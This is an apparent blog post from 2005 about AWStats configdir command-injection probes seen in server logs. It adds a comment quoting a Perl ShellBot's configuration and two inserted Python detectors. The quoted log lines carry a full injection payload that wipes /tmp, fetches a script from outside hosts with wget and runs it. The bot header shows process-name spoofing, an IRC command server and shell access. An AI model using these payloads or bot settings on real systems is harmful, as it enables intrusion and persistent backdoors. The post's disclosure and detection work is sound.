Friday, July 8, 2005

potential security hole in awstats [updated]


I noticed the following entries in my log file:


66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an IRC server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
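The requests above, run through a small detector, as an added example that is not part of the original post and not AWStats code. It parses Apache combined-format lines, URL-decodes the configdir value, flags any that contain shell metacharacters, splits out the command chain the payload would run, and records whether the probed path answered at all: the first entry above returned 200, so awstats.pl was actually present under /awstats/, while the other paths did not exist. The first two sample entries reproduce lines quoted in the post; the third, benign request and the DOWNLOADERS list are assumptions for the example.

```python
"""Flag AWStats configdir command-injection probes in Apache combined-format logs.

Added example, not code from the original post or from AWStats. SAMPLE_LOG is
constructed: the first two entries reproduce lines quoted in the post, the third
is an invented benign request for contrast.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" format:
#   client ident authuser [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Characters that never belong in a directory name but steer a shell, or Perl's
# two-argument open(), into running commands.
SHELL_META = re.compile(r'[|;`&$]')

# Commands a dropper uses to pull its second stage (assumed list, not from the post).
DOWNLOADERS = ("wget", "curl", "fetch", "lynx")

SAMPLE_LOG = [
    '66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '10.0.0.5 - - [09/Jul/2005:08:15:02 -0700] "GET /awstats/awstats.pl?config=example.com&output=main HTTP/1.1" 200 18240 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(query):
    """Decode a query string by hand.  The payload carries raw ';' characters, which
    older urllib.parse.parse_qs versions treat as a pair separator and would shred."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def analyze(line):
    """Return a finding dict for an awstats configdir injection attempt, else None."""
    rec = parse_line(line)
    if rec is None:
        return None
    url = urlsplit(rec["target"])
    if not url.path.endswith("awstats.pl"):
        return None
    configdir = query_params(url.query).get("configdir")
    if configdir is None or not SHELL_META.search(configdir):
        return None
    # Split the decoded value on command separators to see what it would run.
    commands = [c.strip() for c in re.split(r'[;|&]+', configdir) if c.strip()]
    fetched = [c.split()[-1] for c in commands if c.split()[0] in DOWNLOADERS]
    return {
        "ip": rec["ip"],
        "time": rec["time"],
        "path": url.path,
        "status": int(rec["status"]),
        # A 2xx means awstats.pl answered at that path: triage that host first.
        # It does not by itself prove the injected commands ran.
        "endpoint_present": rec["status"].startswith("2"),
        "commands": commands,
        "fetched": fetched,
    }


def scan(lines):
    """Run analyze() over an iterable of log lines and keep the hits."""
    return [hit for hit in map(analyze, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        state = "script present" if hit["endpoint_present"] else "path absent"
        print(f'{hit["ip"]} {hit["path"]} -> {hit["status"]} ({state})')
        print("  would run :", " ; ".join(hit["commands"]))
        print("  downloads :", ", ".join(hit["fetched"]) or "-")
```

On a real server, pass the open access_log to scan() instead of SAMPLE_LOG. The "fetched" list gives the hosts to block and to report; a hit with endpoint_present set is the one that warrants checking the box for /tmp/a.txt, a stray perl process, and outbound IRC connections, since a 200 shows the script was reachable even though it says nothing about which version answered.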




I sent emails to the administrators of the various networks involved to have them stop this activity.  Also, since I am assuming that the script writer is attempting to exploit a hole, there is, or was, one in awstats.  I have left a message on the Awstats developer forum so they can look into this potential problem.


Update:  This was fixed in the 6.4 version of awstats.  If you are running an earlier version, you should update your awstats install.



1 comment:

  1. This is part of the log
    219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    This a.txt file has the header:
    #!/usr/bin/perl
    #
    # ShellBOT - FBI TEAM Corporation
    #
    # 0ldW0lf - effbeeye81@aol.com
    # - www.security.cnc.net
    #
    ################ CONFIGURATION ################################################################
    my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Process name that will show up in ps #
    #----------------------------------------------################################################
    my $linas_max='8'; # Avoids flooding :) after X lines #
    #----------------------------------------------################################################
    my $sleep='4'; # it sleeps X seconds #
    ##################### IRC #####################################################################
    my @adms=("the-brain","adilcm","alalah"); # Administrator nicks
    #
    #----------------------------------------------################################################
    my @canais=("#kit *"); # If there is a password ("#channel :password") #
    #----------------------------------------------################################################
    my $nick='`alah'; # Bot nick. If it is already in use it will show up #
    # with a random number appended #
    #----------------------------------------------################################################
    my $ircname = 'super'; # User ID
    #
    #----------------------------------------------################################################
    chop (my $realname = `uname -a`); # Full Name #
    #----------------------------------------------################################################
    $servidor='213.150.48.155' unless $servidor; # IRC server to use #
    # if none is given as an argument #
    #----------------------------------------------################################################
    my $porta='6667'; # IRC server port #
    ################ SHELL ACCESS #################################################################
    my $secv = 1; # 1/0 to enable/disable shell access #
    ###############################################################################################

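The bot header quoted in the comment above rewrites its visible process name ($processo) so that ps shows an httpd command line. The following check, an added example that is not part of the post or of the quoted bot, compares what each process claims in its argv with the binary the kernel actually loaded: on Linux, /proc/<pid>/exe keeps pointing at the real interpreter no matter what $0 was set to. SAMPLE_PROCS is a constructed table so the check runs offline; INTERPRETERS is an assumed list; the --live switch is this example's own.

```python
"""Spot processes whose ps name disguises a scripting interpreter.

Added example, not code from the original post or the quoted bot.  The bot sets
$0 to an httpd command line, which rewrites /proc/<pid>/cmdline, but
/proc/<pid>/exe still points at the interpreter that is really running.
SAMPLE_PROCS is constructed; INTERPRETERS is an assumed list.
"""
import os
import sys

# Constructed sample: (pid, argv as read from /proc/<pid>/cmdline, link target of /proc/<pid>/exe).
# Perl writes the new $0 over the original argv area, so the spoofed name can
# arrive as a single argv[0] string containing spaces.
SAMPLE_PROCS = [
    (1234, ["/usr/local/apache/bin/httpd", "-DSSL"], "/usr/local/apache/bin/httpd"),  # real apache
    (1235, ["/usr/local/apache/bin/httpd -DSSL"], "/usr/bin/perl5.8.8"),               # the bot
    (1300, ["perl", "a.txt"], "/usr/bin/perl5.8.8"),                                   # honest perl
    (1301, ["sh", "-c", "sleep 4"], "/bin/dash"),                                      # sh -> dash symlink
]

INTERPRETERS = ("perl", "python", "ruby", "php", "sh", "bash", "dash")


def program_name(path):
    """'/usr/bin/perl5.8.8' -> 'perl': basename with a trailing version stripped."""
    return os.path.basename(path).rstrip("0123456789.")


def is_spoofed(argv, exe):
    """True when argv[0] names one program but the loaded binary is an interpreter."""
    if not argv or not argv[0].strip() or not exe:
        return False
    claimed = program_name(argv[0].split()[0])
    actual = program_name(exe.replace(" (deleted)", ""))  # unlinked binaries carry this suffix
    if claimed == actual:
        return False
    if claimed in INTERPRETERS and actual in INTERPRETERS:
        return False  # sh really being dash or bash is a symlink, not a disguise
    return actual in INTERPRETERS


def find_spoofed(procs):
    """Filter (pid, argv, exe) triples down to the suspicious ones."""
    return [(pid, argv, exe) for pid, argv, exe in procs if is_spoofed(argv, exe)]


def live_procs():
    """Collect the same triples from /proc on a Linux host; other users' exe links need root."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as fh:
                argv = [a.decode(errors="replace") for a in fh.read().split(b"\0") if a]
            exe = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue  # process exited, kernel thread, or permission denied
        procs.append((int(entry), argv, exe))
    return procs


if __name__ == "__main__":
    procs = live_procs() if "--live" in sys.argv else SAMPLE_PROCS
    for pid, argv, exe in find_spoofed(procs):
        print(f"pid {pid}: ps shows {' '.join(argv)!r} but exe is {exe}")
```

Run with --live as root on the suspect host. Legitimate daemons that rewrite their argv (gunicorn workers, postgres backends) show up too, so treat a hit as something to look at, not something to kill automatically; for a hit like pid 1235 the next step is /proc/<pid>/cwd and /proc/<pid>/fd, which will show the working directory (the bot runs from /tmp) and its socket to the IRC server.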
